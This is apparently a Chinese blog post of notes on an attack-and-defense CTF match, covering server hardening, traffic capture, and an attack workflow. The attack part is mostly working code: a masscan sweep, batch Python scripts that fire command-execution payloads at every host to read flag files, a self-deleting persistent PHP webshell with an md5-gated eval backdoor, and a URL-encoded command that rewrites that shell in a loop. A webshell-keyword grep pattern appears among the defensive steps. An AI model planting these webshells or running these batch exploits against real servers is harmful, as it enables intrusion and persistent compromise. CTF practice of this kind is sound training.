第一次參加線下AWD比賽，思路太窄，手忙腳亂，通過其他大佬開源的AWD平臺以及比賽的PHP環境整理一下簡單的思路。

GitHubAWD平臺地址：https://github.com/m0xiaoxi/AWD_CTF_Platform

加固思路：

1、登入伺服器SSH 修改密碼：passwd 2、下載原始碼並備份（FileZilla—Sftp—詢問密碼方式） tar -czvf /tmp/html.tar.gz /var/www/html（壓縮） cd /tmp tar -xzvf /tmp/html.tar.gz（解壓） cp -R /tmp/var/www/html/. /var/www/html/ （複製） mysql dump -u root -p test(資料庫名) > test.sql（備份資料庫） mysql -u root -p test(資料庫名) < test.sql （還原資料庫） 3、快速查詢命令：

• 上WAF或日誌記錄（若waf在web目錄下需要刪除掉waf檔案的include）

find /var/www/html -name "*.php"|xargs sed -i "s#<?php#<?php\ninclude('/var/www/html/php_log.php');\n#g"

• 快速查一下shell

find /var/www/html -name "*.php" |xargs egrep 'assert|eval|phpinfo\(\)|\(base64_decoolcode|shell_exec|passthru|file_put_contents\(\.\*\$|base64_decode\('

3、Webshell查殺（D盾）：刪除木馬後門。 4、程式碼審計（seay）：存在漏洞的變數直接寫死等。 5、抓流量：tcpdump tcp -t -s 0 and port 80 -w /tmp/target.cap -t : 不顯示時間戳 -s 0 : 抓取資料包時預設抓取長度為68位元組。加上-S 0 後可以抓到完整的資料包

攻擊思路：

1、掃描攻擊目標：sudo masscan --range 192.168.100.1-192.168.100.100 -Pn -p5000 -oX scan.xml 2、解析scan.xml到IP.txt

 1 import re
 2 
 3 ipaddr_re = "((25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)"
 4 ip_re = "addr=.*addrtype="
 5 port_re = "portid=.*><state"
 6 portnum_re = "[1-9]\d*"
 

 7 
 8 def readxml(path):
 9     with open(path, "r") as f:
10         list = []
11         for line in f.readlines():
12             line = line.strip('\n')  #去掉列表中每一個元素的換行符
13             if "addr=" in line:
14                 ip = re.search(ip_re, line).group()
15                 ip = re.search(ipaddr_re, ip).group()
16                 port = re.search(port_re, line).group()
17                 port = re.search(portnum_re, port).group()
18                 list.append([ip, port])
19         return list
20 
21 def writetxt(list):
22     with open("ip.txt", "w") as f:
23         for i in list:
24             ip_port = i[0] + ":" + i[1] +"\n"
25             f.write(ip_port)
26 
27 def main():
28     list = readxml("scan.xml")
29     writetxt(list)
30 
31 if __name__ == '__main__':
32     main()

View Code

3、burp抓取payload後批量攻擊：

Burp外掛copy as python-requests Burp報文轉換為Python requests庫格式： 輸出示例：

1 import requests
2 
3 burp0_url = "http://192.168.0.103:8801/config.php?a=system(%22ls%22);"
4 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
5 burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
6 requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)

批量訪問指令碼，response寫入result.txt中（由於寫入不死馬連結不會中斷，無法訪問下一個IP，建議加上timeout）：

 1 import requests
 2 import re
 3 import time
 4 
 5 def IP(IP_path):
 6     IP_list = []
 7     with open(IP_path, "r") as f:
 8         for line in f.readlines():
 9             line = line.strip('\n')  #去掉列表中每一個元素的換行符
10             IP_list.append(line)
11     return IP_list
12 
13 def attack(IP_list):
14     result_list = []
15 
16     '''下面引數需要根據實際情況進行替換'''
17     burp0_url = "http://192.168.0.103:8801/images/.config.php?passwd=FPXtian"
18     burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
19     burp0_headers = {"Upgrade-Insecure-Requests": "1",
20                      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
21                      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
22                      "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
23     burp0_data = {"cmd": "system(\"cat ../../../../flag\");"}
24 
25     url = burp0_url.split("/")
26     for ip in IP_list:
27         url[2] = ip
28         burp0_url = "/".join(url)
29         print(burp0_url)
30         try:
31             '''下面語句需要根據實際情況進行替換,建議加上timeout'''
32             r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
33 
34             if r.status_code == 200:
35                 result_list.append(ip + "\n")
36                 result_list.append(r.text + "\n")
37                 print(r.text)
38         except requests.exceptions.Timeout:
39             continue
40     return result_list
41 
42 def write(result_list):
43     with open("result.txt", "w") as f:
44         for line in result_list:
45             f.write(line)
46 
47 def main():
48     IP_list = IP("IP.txt")
49     result_list = attack(IP_list)
50     write(result_list)
51 
52 if __name__ == '__main__':
53     main()

View Code 4、通過預設後門批量種不死馬：
命令執行寫入不死馬： GET方式需要轉換為url編碼：

cmd=system('while%20true%3Bdo%20echo%20%5C'%3C%3Fphp%20if(md5(%24_GET%5Bpasswd%5D)%3D%3D%22139bdb983ee92a3624f2cc978f0cb3b7%22)%7B%40eval(%24_REQUEST%5Bcmd%5D)%3B%7D%20%3F%3E%5C'%20%3E.config.php%3Bsleep%200.1%3Bdone%3B')%3B

明文：

system('while true;do echo \'<?php if(md5($_GET[passwd])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\' >.config.php;sleep 0.1;done;');

5、通過上傳漏洞批量種不死馬： 不死馬.php：

 1 <?php
 2 ignore_user_abort(true);
 3 set_time_limit(0);
 4 unlink(__FILE__);
 5 $file = '.config.php';
 6 $code = '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>';
 7 while (1){
 8     file_put_contents($file,$code);
 9     usleep(5000);
10 }
11 ?>
12 
13 //.config.php?passwd=FPXtian&cmd=system("ls");

6、通過不死馬批量獲取flag： 構造獲取flag payload，使用外掛copy as python-requests生成requests庫的引數，替換至批量訪問指令碼中批量訪問 7、批量提交flag：

 1 import requests
 2 import re
 3 import time
 4 
 5 # flag_re = "flag(.*)"
 6 flag_re = ".{32}"
 7 
 8 def flag(flag_path):
 9     flag_list = []
10     with open(flag_path, "r") as f:
11         for line in f.readlines():
12             line = line.strip('\n')  #去掉列表中每一個元素的換行符
13             if re.search(flag_re, line):
14                 flag = re.search(flag_re, line).group()
15                 flag_list.append(flag)
16     return flag_list
17 
18 def submit(flag_list):
19     for flag in flag_list:
20 
21         '''下面引數需要根據實際情況進行替換'''
22         burp0_url = "http://192.168.0.103:9090"
23         burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
24         burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
25                          "Origin": "http://192.168.0.103:9090", "Content-Type": "application/x-www-form-urlencoded",
26                          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
27                          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
28                          "Referer": "http://192.168.0.103:9090/?flag=1", "Accept-Encoding": "gzip, deflate",
29                          "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
30         burp0_data = {"flag": flag, "token": "4300f7f61934925694f6138f3045e61e"}
31 
32         try:
33             '''下面語句需要根據實際情況進行替換,建議加上timeout'''
34             r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
35             if r.status_code == 200:
36                 print(flag, r.text)
37         except requests.exceptions.Timeout:
38             continue
39 
40 def main():
41     flag_list = flag("result.txt")
42     submit(flag_list)
43 
44 if __name__ == '__main__':
45     main()

View Code

後續防禦與攻擊思路：

1、分析流量：修復漏洞，或者直接通過其他隊伍的攻擊流量進行批量反打。 2、殺不死馬：

1 while true
2 do
3 rm -f .config.php
4 done